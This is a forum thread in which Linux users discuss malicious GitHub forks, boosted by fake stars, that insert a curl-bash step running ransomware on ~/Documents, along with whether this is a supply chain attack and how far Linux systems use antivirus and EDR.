Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (No Skin)
  • No Skin
Collapse
Brand Logo

agnos.is Forums

  1. Home
  2. Linux
  3. Supply chain attack on Github, malware injected in fork ransomwares Linux machines

Supply chain attack on Github, malware injected in fork ransomwares Linux machines

Scheduled Pinned Locked Moved Linux
linux
37 Posts 27 Posters 0 Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • J [email protected]

    This isn't really a supply chain attack. It's more social engineering: fake users, forks, and non-verified code. They're taking advantage of the fact that most people don't use verified releases or packages code from open source projects.

    GitHub is not compromised, nor sending unintended payloads.

    ikidd@lemmy.worldI This user is from outside of this forum
    ikidd@lemmy.worldI This user is from outside of this forum
    [email protected]
    wrote on last edited by
    #6

    Many of the projects are backend dev tools, like the Atlas provider linked in the thread.

    J 1 Reply Last reply
    0
    • S [email protected]

      lol, just checked. ~/Documents doesn't even exist on my machine.

      ikidd@lemmy.worldI This user is from outside of this forum
      ikidd@lemmy.worldI This user is from outside of this forum
      [email protected]
      wrote on last edited by
      #7

      Me neither, I nuke the default freedesktop folders on an install because they clutter up my home folder. But I'd imagine we're the exception.

      1 Reply Last reply
      0
      • ikidd@lemmy.worldI [email protected]

        Many of the projects are backend dev tools, like the Atlas provider linked in the thread.

        J This user is from outside of this forum
        J This user is from outside of this forum
        [email protected]
        wrote on last edited by
        #8

        But that's not a supply chain attack. If projects or platforms are compromised and THEN their code is used by normal means of ingestion of said project, that would be a supply chain attack.

        These are unofficial channels created as forks of existing projects in an attempt to fool users into using these instead.

        ikidd@lemmy.worldI 1 Reply Last reply
        0
        • ikidd@lemmy.worldI [email protected]

          Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly get a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomeware that encrypts ~/Documents.

          About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

          thebardingreen@lemmy.starlightkel.xyzT This user is from outside of this forum
          thebardingreen@lemmy.starlightkel.xyzT This user is from outside of this forum
          [email protected]
          wrote on last edited by
          #9

          Jokes on them, I don't keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore

          H D 2 Replies Last reply
          0
          • ? Guest

            use windows iif ytu dodn watn virus

            N This user is from outside of this forum
            N This user is from outside of this forum
            [email protected]
            wrote on last edited by
            #10

            Tru. With Windows defender đŸ’Ș i can downloat evry .exe from ze internetz. I currently installing Gta 6 early 😎

            1 Reply Last reply
            0
            • thebardingreen@lemmy.starlightkel.xyzT [email protected]

              Jokes on them, I don't keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore

              H This user is from outside of this forum
              H This user is from outside of this forum
              [email protected]
              wrote on last edited by
              #11

              Hahaha. Was about to comment nearly the same thing. My NFS share has a different mount. ~/Documents is an empty directory

              1 Reply Last reply
              0
              • ikidd@lemmy.worldI [email protected]

                Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly get a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomeware that encrypts ~/Documents.

                About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                mangopenguin@lemmy.blahaj.zoneM This user is from outside of this forum
                mangopenguin@lemmy.blahaj.zoneM This user is from outside of this forum
                [email protected]
                wrote on last edited by
                #12

                It's an interesting thing to think about, wouldn't widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?

                J S 2 Replies Last reply
                0
                • ? Guest

                  use windows iif ytu dodn watn virus

                  ikidd@lemmy.worldI This user is from outside of this forum
                  ikidd@lemmy.worldI This user is from outside of this forum
                  [email protected]
                  wrote on last edited by
                  #13

                  I'd rather have ass-cancer.

                  1 Reply Last reply
                  0
                  • J [email protected]

                    But that's not a supply chain attack. If projects or platforms are compromised and THEN their code is used by normal means of ingestion of said project, that would be a supply chain attack.

                    These are unofficial channels created as forks of existing projects in an attempt to fool users into using these instead.

                    ikidd@lemmy.worldI This user is from outside of this forum
                    ikidd@lemmy.worldI This user is from outside of this forum
                    [email protected]
                    wrote on last edited by
                    #14

                    OK, fair enough.

                    1 Reply Last reply
                    0
                    • thebardingreen@lemmy.starlightkel.xyzT [email protected]

                      Jokes on them, I don't keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore

                      D This user is from outside of this forum
                      D This user is from outside of this forum
                      [email protected]
                      wrote on last edited by
                      #15

                      I was going to say that too, ha!

                      1 Reply Last reply
                      0
                      • ? Guest

                        use windows iif ytu dodn watn virus

                        E This user is from outside of this forum
                        E This user is from outside of this forum
                        [email protected]
                        wrote on last edited by
                        #16

                        Sounds legit, thank you.

                        1 Reply Last reply
                        0
                        • ikidd@lemmy.worldI [email protected]

                          Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly get a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomeware that encrypts ~/Documents.

                          About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                          ? Offline
                          ? Offline
                          Guest
                          wrote on last edited by
                          #17

                          Another reason that star count is a terrible metric for quality / authenticity. Fake stars are a huge problem that not a lot of people take seriously.

                          1 Reply Last reply
                          0
                          • mangopenguin@lemmy.blahaj.zoneM [email protected]

                            It's an interesting thing to think about, wouldn't widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?

                            J This user is from outside of this forum
                            J This user is from outside of this forum
                            [email protected]
                            wrote on last edited by
                            #18

                            Uhhhhh, there's plenty of that being used. From the ground up. Security scanning out the wazzzz. Those are pattern-based scanners though, and this probably wouldn't be detected because it's a blob of binary junk with a script inside. GitHub should honestly put something on their storage backends to warn users, but that's a whole ball of wax people probably don't want to get into.

                            1 Reply Last reply
                            0
                            • mangopenguin@lemmy.blahaj.zoneM [email protected]

                              It's an interesting thing to think about, wouldn't widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?

                              S This user is from outside of this forum
                              S This user is from outside of this forum
                              [email protected]
                              wrote on last edited by
                              #19

                              It depends on the environment. I've been in a couple of places which use Linux for various professional purposes. At one site, all systems with a network connection were required to have A/V, on-access scanning and regular system scans. So, even the Linux systems had a full A/V agent and we were in the process of rolling out EDR to all Linux based hosts when I left. That was a site where security tended to be prioritized, though much of it was also "checkbox security". At another site, A/V didn't really exist on Linux systems and they were basically black boxes on the network, with zero security oversight. Last I heard, that was finally starting to change and Linux hosts were getting the full A/V and EDR treatment. Though, that's always a long process. I also see a similar level of complacency in "the cloud". Devs spin random shit up, give it a public IP, set the VPS to a default allow and act like it's somehow secure because, "it's in the cloud". Some of that will be Linux based. And in six months to a year, it's woefully out of date, probably running software with known vulnerabilities, fully exposed to the internet and the dev who spun it up may or may not be with the company anymore. Also, since they were "agile", the documentation for the system is filed under "lol, wut?"

                              Overall, I think Linux systems are a mixed bag. For a long time, they just weren't targeted with normal malware. And this led to a lot of complacency. Most sites I have been at have had a few Linux systems kicking about; but, because they were "one off" systems and from a certain sense of invulnerability they were poorly updated and often lacked a secure baseline configuration. The whole "Linux doesn't get malware" mantra was used to avoid security scrutiny. At the same time, Linux system do tend to default to a more secure configuration. You're not going to get a BlueKeep type vulnerability from a default config. Still, it's not hard for someone who doesn't know any better to end up with a vulnerable system. And things like ransomware, password stealers, RATs or other basic attacks often run just fine in a user context. It's only when the attacker needs to get root that things get harder.

                              In a way, I'd actually appreciate a wide scale, well publicized ransomware attack on Linux systems. First off, it would show that Linux is finally big enough for attackers to care about. Second, it would provide concrete proof as to why Linux systems should be given as much attention and centrally managed/secured in the Enterprise. I know everyone hates dealing with IT for provisioning systems, and the security software sucks balls; but, given the constant barrage of attacks, those sorts of things really are needed.

                              1 Reply Last reply
                              0
                              • cralder@lemmy.worldC [email protected]

                                Average arch user

                                O This user is from outside of this forum
                                O This user is from outside of this forum
                                [email protected]
                                wrote on last edited by
                                #20

                                oh oh, I'm a below average arch user.
                                I suspect i copied most of my hoome from debian or something.

                                I'll rename it to Dickuments as a security feature.

                                L 1 Reply Last reply
                                0
                                • ? Guest

                                  use windows iif ytu dodn watn virus

                                  P This user is from outside of this forum
                                  P This user is from outside of this forum
                                  [email protected]
                                  wrote on last edited by
                                  #21

                                  You can't get a virus if your computer's already dependent on one!

                                  1 Reply Last reply
                                  0
                                  • ? Guest

                                    use windows iif ytu dodn watn virus

                                    S This user is from outside of this forum
                                    S This user is from outside of this forum
                                    [email protected]
                                    wrote on last edited by
                                    #22

                                    I tried that, I ended up with this weird "Windows 11" adware installed and couldn't get rid of it. There was also a problem with odd programs and advertising showing up in my Start Menu, even after I removed them. Also, my settings would occasionally just change, without my knowledge or permission.

                                    1 Reply Last reply
                                    0
                                    • O [email protected]

                                      oh oh, I'm a below average arch user.
                                      I suspect i copied most of my hoome from debian or something.

                                      I'll rename it to Dickuments as a security feature.

                                      L This user is from outside of this forum
                                      L This user is from outside of this forum
                                      [email protected]
                                      wrote on last edited by
                                      #23

                                      Hackers gonna wanna Netflix and chill

                                      1 Reply Last reply
                                      0
                                      • ikidd@lemmy.worldI [email protected]

                                        Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly get a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomeware that encrypts ~/Documents.

                                        About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                                        aatube@kbin.melroy.orgA This user is from outside of this forum
                                        aatube@kbin.melroy.orgA This user is from outside of this forum
                                        [email protected]
                                        wrote on last edited by
                                        #24

                                        Finally, Linux is popular enough to get targeted by malware!

                                        sturgist@lemmy.caS 1 Reply Last reply
                                        0
                                        • ikidd@lemmy.worldI [email protected]

                                          Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly get a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomeware that encrypts ~/Documents.

                                          About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                                          P This user is from outside of this forum
                                          P This user is from outside of this forum
                                          [email protected]
                                          wrote on last edited by
                                          #25

                                          Yay, finally Linux is being attacked!

                                          And as expected it takes whole lot more than clicking on an email attachment

                                          Always check before you curl download something!

                                          R 1 Reply Last reply
                                          0
                                          Reply
                                          • Reply as topic
                                          Log in to reply
                                          • Oldest to Newest
                                          • Newest to Oldest
                                          • Most Votes


                                          • Login

                                          • Login or register to search.
                                          • First post
                                            Last post
                                          0
                                          • Categories
                                          • Recent
                                          • Tags
                                          • Popular
                                          • World
                                          • Users
                                          • Groups